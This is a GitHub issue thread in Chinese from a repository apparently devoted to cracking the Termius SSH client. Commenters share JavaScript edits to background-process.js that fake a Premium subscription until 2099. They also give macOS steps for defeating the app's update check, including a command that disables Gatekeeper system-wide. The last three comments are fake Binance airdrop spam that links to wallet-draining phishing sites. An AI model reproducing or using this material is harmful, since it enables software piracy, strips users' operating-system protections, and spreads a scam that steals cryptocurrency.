### ISSUE TITLE
Version 7.42.2 - Released 21 June, 2022

### ISSUE THREAD

**Issue by haihaiW** [vicosna/termius-cracked#10]
termius Version 7.42.2 - Released 21 June, 2022 有新的版本吗。
![image](https://user-images.githubusercontent.com/23313192/175005747-eeb464af-a51c-43e4-8f4d-5d519181fdcc.png)

**Comment by jackey-jiang** [comment]
同问! 不过是MAC用户

**Comment by huahuacn** [comment]
MAC用户同问~

**Comment by h3110w0r1d-y** [comment]
修改app/js/background-process.js
搜索`await this.api.bulkAccount`，将前面的`const` x=e=await this.api.bulkAccount();修改为`var` x=e=await this.api.bulkAccount();，并且在后面加入下面几行
```js
var e=await this.api.bulkAccount();
e.account.pro_mode=true;
e.account.current_period={
    "from": "2022-01-01T00:00:00",
    "until": "2099-01-01T00:00:00"
};
e.account.plan_type="Premium";
e.account.user_type="Premium";
e.account.authorized_features.show_trial_section=false;
e.account.authorized_features.show_subscription_section=true;
delete e.trial;
delete e.team;
delete e.student;
return 省略
```
<img width="469" alt="image" src="https://user-images.githubusercontent.com/52311174/191709528-a15c7a76-541c-482f-9504-bb7fc5d9cba8.png">

搜索`await this.api.login`，同样将`const` o=await this.api.login改为`var` o=await this.api.login，然后和上面差不多，加上那几行就可以了，这样登录账号之后就是Pro
<img width="448" alt="image" src="https://user-images.githubusercontent.com/52311174/191709337-fbb1dcfa-eea3-4f73-a3de-a7c039a822a5.png">
<img width="1059" alt="image" src="https://user-images.githubusercontent.com/52311174/191710048-0f3ef813-07fe-4ad3-a3af-c8a2dd68e6ae.png">

**Comment by jackey-jiang** [comment]
> 修改app/js/background-process.js 搜索`await this.api.bulkAccount`，将前面的`const` x=e=await this.api.bulkAccount();修改为`var` x=e=await this.api.bulkAccount();，并且在后面加入下面几行
> 
> ```js
> var e=await this.api.bulkAccount();
> e.account.pro_mode=true;
> e.account.current_period={
>     "from": "2022-01-01T00:00:00",
>     "until": "2099-01-01T00:00:00"
> };
> e.account.plan_type="Premium";
> e.account.user_type="Premium";
> e.account.authorized_features.show_trial_section=false;
> e.account.authorized_features.show_subscription_section=true;
> delete e.trial;
> delete e.team;
> delete e.student;
> return 省略
> ```
> 
> <img alt="image" width="469" src="https://user-images.githubusercontent.com/52311174/191709528-a15c7a76-541c-482f-9504-bb7fc5d9cba8.png">
> 
> 搜索`await this.api.login`，同样将`const` o=await this.api.login改为`var` o=await this.api.login，然后和上面差不多，加上那几行就可以了，这样登录账号之后就是Pro <img alt="image" width="448" src="https://user-images.githubusercontent.com/52311174/191709337-fbb1dcfa-eea3-4f73-a3de-a7c039a822a5.png"> <img alt="image" width="1059" src="https://user-images.githubusercontent.com/52311174/191710048-0f3ef813-07fe-4ad3-a3af-c8a2dd68e6ae.png">

谢谢大佬,不过还有一个问题,修改后如何再生成app.asar文件呢?谢谢了

**Comment by h3110w0r1d-y** [comment]
> 

不用重新打包，把原来的app.asar删掉或者备份一下，留着app那个文件夹就可以正常启动，它自动从app文件夹里加载程序

**Comment by jackey-jiang** [comment]
> > 
> 
> 不用重新打包，把原来的app.asar删掉或者备份一下，留着app那个文件夹就可以正常启动，它自动从app文件夹里加载程序

大佬，我是mac用户，目前看来 只有app.asar文件，并没有app那个文件夹，这种情况 该如何处理呢
<img width="1032" alt="image" src="https://user-images.githubusercontent.com/10288803/191772497-1d5eb1ca-378a-4367-bc95-34226c79fd88.png">

**Comment by jackey-jiang** [comment]
> > 
> 
> 不用重新打包，把原来的app.asar删掉或者备份一下，留着app那个文件夹就可以正常启动，它自动从app文件夹里加载程序
你好，按照您的方式在mac上测试后，好像不好使。界面显示不出来， 过了一会后，app加载了下进度条，然后Resource目录 app.asar自动又重新下载回来了，我加入进去的修改后的app文件夹没有了
如果可以的话。麻烦大佬，能重新修改一份打包成app.asar么，拜谢了！！！
<img width="1290" alt="image" src="https://user-images.githubusercontent.com/10288803/191778431-0d52b137-c53b-47a1-b0ec-fa5b7d84f85b.png">

<img width="1032" alt="image" src="https://user-images.githubusercontent.com/10288803/191778504-16b564c5-bb49-4887-b726-0c0fbf0f245a.png">

**Comment by h3110w0r1d-y** [comment]
@jackey-jiang 删除app-update.yml，重新解包，修改，删除app.asar，启动软件

**Comment by jackey-jiang** [comment]
> @jackey-jiang 删除app-update.yml，重新解包，修改，删除app.asar，启动软件

按照你的指导，打开后提示app已损坏。。。不晓得是我哪里没做对？
步骤：下载新的app->安装app->删除resources目录里的app-udate.yml和app.asar->最后把修改好的app文件夹放进Resources目录->打开app->提示app已损坏

<img width="934" alt="image" src="https://user-images.githubusercontent.com/10288803/191790696-79c63e3f-490d-4fa5-95d7-f747a5fd3527.png">

以下为js修改的内容
<img width="621" alt="image" src="https://user-images.githubusercontent.com/10288803/191790863-5177666c-d8bc-452a-a23b-f5139ad5e363.png">

<img width="639" alt="image" src="https://user-images.githubusercontent.com/10288803/191790981-fdb8927d-4ae3-4379-a11a-c66c98c804e8.png">

**Comment by h3110w0r1d-y** [comment]
sudo spctl --master-disable && xattr -cr /Applications/Termius.app

**Comment by StrangePeanut** [comment]
@h3110w0r1d-y 很感谢这个方法，效果很好

**Comment by jackey-jiang** [comment]
> ```js
> this.api.bulkAccoun
> ```

是mac用户么，试过好多次都还是不行，请问你那边是怎样的操作步骤呢

**Comment by jackey-jiang** [comment]
> @h3110w0r1d-y 很感谢这个方法，效果很好

是mac用户么，试过好多次都还是不行，请问你那边是怎样的操作步骤呢

**Comment by jackey-jiang** [comment]
> sudo spctl --master-disable && xattr -cr /Applications/Termius.app

mac用户还是没能搞定，不能正常显示了，大佬，请问还有法子么
<img width="1392" alt="image" src="https://user-images.githubusercontent.com/10288803/192145923-7540f399-da98-444a-a2fd-a99436f3edd8.png">

**Comment by StrangePeanut** [comment]
@jackey-jiang 很遗憾我的中文不太好。我不使用Mac但我觉得Windows或Mac不要紧，方法应该是一样的吧

**Comment by cddehsy** [comment]
有成品吗各位

**Comment by StrangePeanut** [comment]
@cddehsy 有

**Comment by StrangePeanut** [comment]
@cddehsy 

![Fuxi20221022](https://user-images.githubusercontent.com/56807288/197306986-eec7d89e-fa28-4b07-b8a9-c47fc6ad99d8.png)

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by kongkiatchanu** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @kartikeypant, @schrodyn, @MarkLee131, @lulichn, @thithuy265527, @kels-code, @koredump

**Comment by kongkiatchanu** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @xcalts, @10fous, @rpedroni, @elqsar, @anurag-git, @liujin0215, @jzeng4
